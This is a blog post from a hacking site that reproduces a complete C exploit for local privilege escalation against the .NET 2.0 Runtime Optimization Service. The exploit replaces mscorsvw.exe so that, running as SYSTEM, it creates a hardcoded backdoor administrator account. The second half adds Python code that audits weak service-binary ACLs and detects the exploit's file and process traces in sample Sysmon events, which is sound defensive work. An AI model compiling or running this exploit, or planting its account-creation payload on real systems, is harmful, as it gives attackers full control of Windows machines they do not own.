
K8拉登哥哥's Blog

K8搞基大队 [K8team]: information security, network security, 0day vulnerabilities, penetration testing, hacking

Microsoft .NET 2.0.50727 Runtime Optimization Service local privilege escalation vulnerability

2011-03-17 16:15:52 | Category: 0day vulnerabilities



/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <xenomuta@tuxfamily.org>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a
  
    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
 /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/
  
 xenomuta [at] tuxfamily.org
 xenomuta [at] gmail.com
 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
  
 This one's a no-brainer, plain simple:
  
 This service's EXE file can be overwritten by any non-admin domain user
 and local power users (which are the default permissions set).
 This exploit compiles to a service that uses the original service's id.
  
 Tested on Windows 2003, WinXP (sp3) and Win7 
 ( my guess is that it runs on any win box running this service ).
  
 greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!
   
 bless y'all!
  
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
  
SERVICE_STATUS          ServiceStatus;
SERVICE_STATUS_HANDLE   hStatus;
  
#define PWN_EXE     "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT   "mscorsvw.exe"
#define PWN_NAME    ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID      "clr_optimization_v2.0.50727_32"
  
/* Forward declarations: ServiceMain uses both before they are defined. */
void WINAPI ControlHandler(DWORD request);
int  InitService(void);
  
/* Payload. Runs as LocalSystem once the SCM starts the replaced binary:
 * creates the ServiceHelper account and adds it to local Administrators.
 * Returns the command's exit status (0 on success); the original fell off
 * the end of the function and left the return value undefined. */
int InitService(void) {
    return system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}
  
/* Minimal control handler so that hStatus is a registered handle before
 * SetServiceStatus is called; it only acknowledges stop/shutdown. */
void WINAPI ControlHandler(DWORD request) {
    switch (request) {
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
        ServiceStatus.dwWin32ExitCode = 0;
        break;
    default:
        break;
    }
    SetServiceStatus(hStatus, &ServiceStatus);
}
  
/* Entry point the SCM calls through StartServiceCtrlDispatcher, under the
 * original service's id (PWN_ID). */
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv) {
    (void)argc; (void)argv;
  
    ServiceStatus.dwServiceType             = SERVICE_WIN32_OWN_PROCESS;
    ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode           = 0;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwCheckPoint              = 0;
    ServiceStatus.dwWaitHint                = 0;
  
    hStatus = RegisterServiceCtrlHandler(PWN_ID, ControlHandler);
    if (hStatus == (SERVICE_STATUS_HANDLE)0)
        return;
  
    if (InitService() != 0) {
        /* account creation failed: report it and stop */
        ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
        ServiceStatus.dwWin32ExitCode = (DWORD)-1;
        SetServiceStatus(hStatus, &ServiceStatus);
        return;
    }
    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &ServiceStatus);
}
  
int main(int argc, char **argv) {
    char  acUserName[100];
    DWORD nUserName = sizeof(acUserName);
    char  str[2048];          /* snprintf needs MinGW or MSVC 2015+ */
  
    (void)argc;
    GetUserName(acUserName, &nUserName);
  
    /* Stage 1, run by the low-privilege user: move the real mscorsvw.exe
     * aside, drop this binary in its place and ask the SCM to start the
     * service. The default ACL on the file is what lets the rename and
     * the copy succeed. */
    if (strcmp(acUserName, "SYSTEM") != 0) {
        snprintf(str, sizeof(str), "%s.bak", PWN_EXE);
        if (rename(PWN_EXE, str) != 0) {
            fprintf(stderr, " :(  sorry, can't write to file.\n");
            return 1;
        }
        /* bFailIfExists = TRUE is safe: the original was just renamed away */
        if (!CopyFile(argv[0], PWN_EXE, TRUE)) {
            fprintf(stderr, " :(  sorry, can't copy %s to %s (error %lu).\n",
                    argv[0], PWN_EXE, (unsigned long)GetLastError());
            return 1;
        }
        snprintf(str, sizeof(str), "net start \"%s\" 2> NUL > NUL", PWN_NAME);
        printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
        system(str);
        return 0;
    }
  
    /* Stage 2, run by the SCM as LocalSystem: hand control to ServiceMain. */
    {
        SERVICE_TABLE_ENTRY ServiceTable[2];
        ServiceTable[0].lpServiceName = PWN_ID;
        ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
        ServiceTable[1].lpServiceName = NULL;
        ServiceTable[1].lpServiceProc = NULL;
        StartServiceCtrlDispatcher(ServiceTable);
    }
    return 0;
}
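The whole exploit rests on one condition stated in the header: the service binary's ACL grants write access to principals a non-admin user belongs to, while the service itself runs as LocalSystem. The check below is an added example, not code from XenoMuta or the original post: it parses the text output of `sc qc <service>` and `icacls <binary>` (the sample outputs are constructed, including the principal that holds Full control) and reports every ACE that lets a low-privilege group rewrite the file the SCM will launch. It checks the file's ACEs only; the rename step in the exploit additionally needs delete rights, which F and M on the file include, and the directory DACL is not examined.

```python
import re

# Added example (not from the original post): flag service binaries that a
# low-privilege principal can replace, using the text output of
# `sc qc <service>` and `icacls <binary>`. The sample outputs are constructed.

# Groups every interactive non-admin user, or a non-admin domain user, belongs to.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "builtin\\power users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls rights that allow rewriting the file or its DACL: the simple rights
# F (full), M (modify), W (write), D (delete) and the specific rights WD (write
# data), AD (append data), WDAC (write DACL), WO (write owner), GW/GA (generic).
WRITE_EQUIVALENT = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO", "GW", "GA"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<groups>(?:\([^()]*\))+)$")


def parse_sc_qc(output):
    """Extract the binary path and run-as account from `sc qc` output."""
    cfg = {}
    for line in output.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "BINARY_PATH_NAME":
            if value.startswith('"'):                 # quoted path with arguments
                value = value[1:value.index('"', 1)]
            else:                                     # unquoted: cut at the first .exe
                m = re.match(r"(.*?\.exe)", value, re.IGNORECASE)
                value = m.group(1) if m else value.split()[0]
            cfg["binary"] = value
        elif key == "SERVICE_START_NAME":
            cfg["account"] = value
    return cfg


def parse_icacls(path, output):
    """Return [(principal, is_deny, rights)] from `icacls <path>` output.

    icacls prints the path and the first ACE on one line, the remaining ACEs on
    indented lines, then a 'Successfully processed ...' summary line.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^()]*)\)", m.group("groups"))
        rights = set()
        for g in groups:
            if g not in INHERIT_FLAGS and g != "DENY":
                rights.update(t.strip() for t in g.split(","))
        aces.append((m.group("principal").strip(), "DENY" in groups, rights))
    return aces


def is_low_priv(principal):
    p = principal.lower()
    return p in LOW_PRIV_PRINCIPALS or p.endswith("\\domain users")


def audit_service(sc_qc_output, icacls_output):
    """Return (service config, [(principal, rights)]) for ACEs that let a
    non-admin replace the binary the service runs as SERVICE_START_NAME."""
    cfg = parse_sc_qc(sc_qc_output)
    findings = []
    for principal, deny, rights in parse_icacls(cfg["binary"], icacls_output):
        hit = rights & WRITE_EQUIVALENT
        if hit and not deny and is_low_priv(principal):
            findings.append((principal, sorted(hit)))
    return cfg, findings


# Constructed sample output for the service from the post (not captured from a real host).
SC_QC_SAMPLE = r"""
SERVICE_NAME: clr_optimization_v2.0.50727_32
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
        DISPLAY_NAME       : .NET Runtime Optimization Service v2.0.50727_X86
        SERVICE_START_NAME : LocalSystem
"""

ICACLS_WEAK = r"""
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe BUILTIN\Power Users:(I)(F)
                                                           BUILTIN\Users:(I)(RX)
                                                           NT AUTHORITY\SYSTEM:(I)(F)
                                                           BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# The same file after resetting the weak ACE to read/execute.
ICACLS_HARDENED = ICACLS_WEAK.replace("Power Users:(I)(F)", "Power Users:(I)(RX)")

if __name__ == "__main__":
    cfg, findings = audit_service(SC_QC_SAMPLE, ICACLS_WEAK)
    for principal, rights in findings:
        print(f"{cfg['binary']} runs as {cfg['account']} but {principal} has {','.join(rights)}")
```

On a live host, feed `audit_service` the real output of the two commands (for example via `subprocess.run(["sc", "qc", name], capture_output=True, text=True).stdout`); any finding on a service that runs as LocalSystem is the exact precondition this exploit needs.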
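From the defender's side the exploit leaves three distinct traces, all visible in the code above: the service binary is created by a non-SYSTEM account (the rename to `.bak` plus `CopyFile`), `mscorsvw.exe` spawns `cmd.exe` as SYSTEM, and that command line creates a local account and puts it in Administrators. The detection logic below is an added example, not part of the original post; it runs over constructed Sysmon-style records whose field names follow Sysmon Event ID 1 (ProcessCreate) and Event ID 11 (FileCreate), with the user `CORP\jdoe` and the paths of the dropped binary made up for the sample.

```python
import re

# Added example (not from the original post): detection rules for the three
# observable steps of the exploit above, run over constructed Sysmon-style
# events. Field names follow Sysmon Event ID 1 (ProcessCreate) and Event ID 11
# (FileCreate); the records themselves are made up for this example.

SERVICE_EXE = r"c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe"
# "net user <name> <password> /add" and "net localgroup administrators <name> /add",
# also matching net1.exe, which net.exe hands most commands to.
ACCOUNT_ADD_RE = re.compile(r"\bnet(?:1|\.exe)?\s+user\s+\S+\s+\S+\s+/add", re.IGNORECASE)
ADMIN_GROUP_RE = re.compile(r"\bnet(?:1|\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return [(rule_name, event)] for every event that matches a rule."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 11:
            # Rule 1: the service binary is created by a non-SYSTEM account. The
            # exploit renames mscorsvw.exe to .bak and CopyFile()s itself into place
            # from the low-privilege user's session; legitimate servicing runs as SYSTEM.
            if ev["TargetFilename"].lower() == SERVICE_EXE and ev["User"].upper() != "NT AUTHORITY\\SYSTEM":
                alerts.append(("service_binary_replaced", ev))
        elif ev["EventID"] == 1:
            # Rule 2: the optimization service has no reason to run a shell; a cmd/net
            # child of mscorsvw.exe is the payload's InitService() executing as SYSTEM.
            if basename(ev["ParentImage"]) == "mscorsvw.exe" and basename(ev["Image"]) in ("cmd.exe", "net.exe", "net1.exe"):
                alerts.append(("shell_spawned_by_service", ev))
            # Rule 3: a local account created and added to Administrators in one
            # command line, whoever the parent is.
            if ACCOUNT_ADD_RE.search(ev["CommandLine"]) and ADMIN_GROUP_RE.search(ev["CommandLine"]):
                alerts.append(("local_admin_created", ev))
    return alerts


# Constructed event stream reproducing the exploit's sequence plus benign noise.
EVENTS = [
    # low-priv user drops the exploit binary over the service executable
    {"EventID": 11, "User": "CORP\\jdoe", "Image": r"C:\Users\jdoe\pwn.exe",
     "TargetFilename": r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe"},
    # and asks the SCM to start the service
    {"EventID": 1, "User": "CORP\\jdoe", "Image": r"C:\Windows\System32\net.exe",
     "ParentImage": r"C:\Users\jdoe\pwn.exe",
     "CommandLine": 'net start ".NET Runtime Optimization Service v2.0.50727_X86"'},
    # the SCM launches the replaced binary as LocalSystem (benign-looking by itself)
    {"EventID": 1, "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "mscorsvw.exe"},
    # which runs the payload
    {"EventID": 1, "User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe",
     "CommandLine": "cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add"},
    # unrelated, benign net.exe use by the same user
    {"EventID": 1, "User": "CORP\\jdoe", "Image": r"C:\Windows\System32\net.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"net use Z: \\fileserver\share"},
]

if __name__ == "__main__":
    for rule, ev in detect(EVENTS):
        print(f"{rule}: {ev['User']} {ev.get('Image', '')} {ev.get('CommandLine', ev.get('TargetFilename', ''))}")
```

Rule 1 is the earliest and cheapest signal, since it fires before the service is ever started; rules 2 and 3 catch the payload when it has already run as SYSTEM and are also what you would hunt for retrospectively.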